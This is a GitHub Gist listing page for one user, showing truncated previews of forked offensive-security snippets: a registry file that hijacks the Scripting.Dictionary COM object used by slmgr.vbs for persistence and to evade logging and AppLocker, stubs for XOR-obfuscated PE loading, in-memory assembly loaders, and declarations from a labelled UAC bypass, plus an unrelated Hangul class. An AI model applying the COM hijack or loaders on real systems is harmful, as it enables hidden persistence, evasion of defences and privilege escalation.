decay88
decay88
/ slmgr-com-hijack.reg
Created
July 13, 2019 08:04
— forked from mgeeky/slmgr-com-hijack.reg
Example presenting how to Hijack COM object named "Scripting.Dictionary" used by slmgr.vbs (CreateObject("Scripting.Dictionary")) in order to obtain persistence or evade Command Line logging and AppLocker
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | |
| @="" | |
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] | |
| @="Scripting.Dictionary" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "Windows.h" | |
| PBYTE _ReadFileHelper(LPCWSTR); | |
| int run_portable_executable(void*); | |
| void function_stub(); | |
| void XorBlock(DWORD dwStartAddress, DWORD dwSize) | |
| { | |
| __asm | |
| { |
decay88
/ functions.cpp
Created
July 1, 2019 15:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "Windows.h" | |
| PBYTE _ReadFileHelper(LPCWSTR); | |
| int run_portable_executable(void*); | |
| void function_stub(); | |
| void XorBlock(DWORD dwStartAddress, DWORD dwSize) | |
| { | |
| __asm | |
| { |
decay88
/ GetDelegateForFunctionPointer.cs
Created
May 31, 2019 20:10
— forked from breezhang/GetDelegateForFunctionPointer.cs
Marshal --> ( Marshal.GetFunctionPointerForDelegate GetDelegateForFunctionPointer)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static partial class Util | |
| { | |
| const string kDelegateInvokeMethodName = "Invoke"; | |
| // http://www.codeproject.com/Tips/441743/A-look-at-marshalling-delegates-in-NET | |
| public static T GetDelegateForFunctionPointer<T>(IntPtr ptr, System.Runtime.InteropServices.CallingConvention call_conv) | |
| where T : class | |
| { | |
| Contract.Requires<ArgumentException>(typeof(T).IsSubclassOf(typeof(Delegate))); | |
| Contract.Requires<ArgumentNullException>(ptr != IntPtr.Zero); | |
| Contract.Requires<ArgumentException>(call_conv != System.Runtime.InteropServices.CallingConvention.ThisCall, |
decay88
/ DynamicWrapperCS.cs
Created
May 12, 2019 06:42
— forked from TheWover/DynamicWrapperCS.cs
Dynamic Wrapper 1.1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| using System.Runtime; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| using System.EnterpriseServices; | |
| using ComTypes = System.Runtime.InteropServices.ComTypes; | |
decay88
/ EmbeddedAssembly.cs
Created
April 18, 2019 04:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Reflection; | |
| using System.Security.Cryptography; | |
| /// <summary> | |
| /// A class for loading an Embedded Assembly | |
| /// </summary> | |
| /// <remarks> |
decay88
/ AssemblyLoader.cs
Created
April 18, 2019 04:25
— forked from thedava/AssemblyLoader.cs
Assembly Loader
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Original Author: Lars Holm | |
| * Improved Usage: David Sommer | |
| * Since: 03.02.2012 | |
| **/ | |
| using System; | |
| using System.Reflection; | |
| using System.Resources; |
decay88
/ gist:d2b5f3da3427c83d6b35918ce153b67f
Created
April 18, 2019 04:20
— forked from hfiref0x/gist:59c689a14f1fc2302d858ae0aa3f6b86
CIA Stinger UAC bypass (likely)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD Error, bytesIO; | |
| NTSTATUS Status; | |
| HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
| BOOL bCond = FALSE; | |
| SHELLEXECUTEINFO shinfo; | |
| SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
| TOKEN_MANDATORY_LABEL tml, *ptml; | |
| PSID pIntegritySid = NULL; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public sealed class Hangul | |
| { | |
| private const string Choseongs = "ㄱㄲㄴㄷㄸㄹㅁㅂㅃㅅㅆㅇㅈㅉㅊㅋㅌㅍㅎ"; | |
| private const string Jungseongs = "ㅏㅐㅑㅒㅓㅔㅕㅖㅗㅘㅙㅚㅛㅜㅝㅞㅟㅠㅡㅢㅣ"; | |
| private const string Jongseongs = " ㄱㄲㄳㄴㄵㄶㄷㄹㄺㄻㄼㄽㄾㄿㅀㅁㅂㅄㅅㅆㅇㅈㅊㅋㅌㅍㅎ"; | |
| public char Letter { get; } | |
| public char Choseong { get; } | |
| public char Jungseong { get; } | |
| public char Jongseong { get; } |
decay88
/ LoadAndInvoke.cs
Created
April 18, 2019 04:16
— forked from vivami/LoadAndInvoke.cs
Load Assembly and dynamically create an instance and invoke Main method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static string srcTemplate = @"using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Reflection; | |
| using System.Security.Cryptography; | |
| namespace Loader { | |
| public static class Loader { | |
| private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc }; |